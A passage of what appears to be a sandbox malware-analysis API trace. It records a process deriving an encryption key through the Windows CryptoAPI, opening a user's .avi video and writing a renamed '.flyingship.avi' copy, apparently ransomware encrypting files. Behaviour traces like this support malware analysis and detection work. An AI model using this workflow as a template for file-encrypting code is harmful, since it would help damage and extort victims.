lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.177] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.178] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.178] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0197.178] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.178] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7058bcd0, ftCreationTime.dwHighDateTime=0x1d5e3e4, ftLastAccessTime.dwLowDateTime=0xd897bd50, ftLastAccessTime.dwHighDateTime=0x1d5db74, ftLastWriteTime.dwLowDateTime=0xd897bd50, ftLastWriteTime.dwHighDateTime=0x1d5db74, nFileSizeHigh=0x0, nFileSizeLow=0xe1da, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="9e BCelV9odP5IiT.avi", cAlternateFileName="9EBCEL~1.AVI")) returned 0x90ae18 [0197.178] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0197.178] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.178] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.178] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.178] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.178] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0197.178] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.178] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0197.178] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.178] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.179] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0197.179] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.179] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.179] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.179] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.179] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.179] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0197.179] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.179] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c88) returned 1 [0197.180] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.180] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.180] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0197.180] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.180] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.194] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.194] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.194] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.194] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.194] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.194] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0197.194] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0197.194] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.194] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.194] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.194] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0197.194] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.194] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.194] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0197.194] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.194] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0197.194] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0197.194] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.195] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.195] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0197.195] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.195] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0197.195] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0197.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.195] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.195] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.195] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.195] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.195] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.195] CryptCreateHash (in: hProv=0x9c0c88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0197.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.195] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0197.195] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.196] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.196] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.196] CryptHashData (hHash=0x90af58, pbData=0x8df140, dwDataLen=0x19, dwFlags=0x1) returned 1 [0197.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.196] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.196] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.196] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.196] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0197.196] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0197.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.196] CryptDeriveKey (in: hProv=0x9c0c88, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0197.197] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.197] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.197] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.197] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.197] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.197] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0197.197] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0197.197] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0197.197] CryptDestroyHash (hHash=0x90af58) returned 1 [0197.197] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0197.197] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.197] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.197] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.197] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.198] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\9e bcelv9odp5iit.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0197.199] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.199] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0197.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0197.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0197.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0197.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0197.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0197.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0197.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0197.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.199] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0197.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0197.199] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0197.199] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0197.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0197.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0197.200] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0197.200] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0197.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0197.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0197.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0197.200] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0197.200] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0197.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0197.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0197.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0197.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0197.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0197.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0197.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0197.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c08b0 [0197.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0197.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0197.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0197.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0197.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c08b0 | out: hHeap=0x8a0000) returned 1 [0197.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0197.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0197.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0197.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0197.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0197.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0197.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0197.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0197.201] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0197.201] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0197.201] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg")) returned 0x10 [0197.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0197.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0197.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0197.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0197.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0197.202] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0197.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0197.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0197.202] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0197.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0197.203] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.flyingship.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\9e bcelv9odp5iit.flyingship.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0197.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0197.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0197.203] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0197.203] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0197.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0197.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0197.204] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: 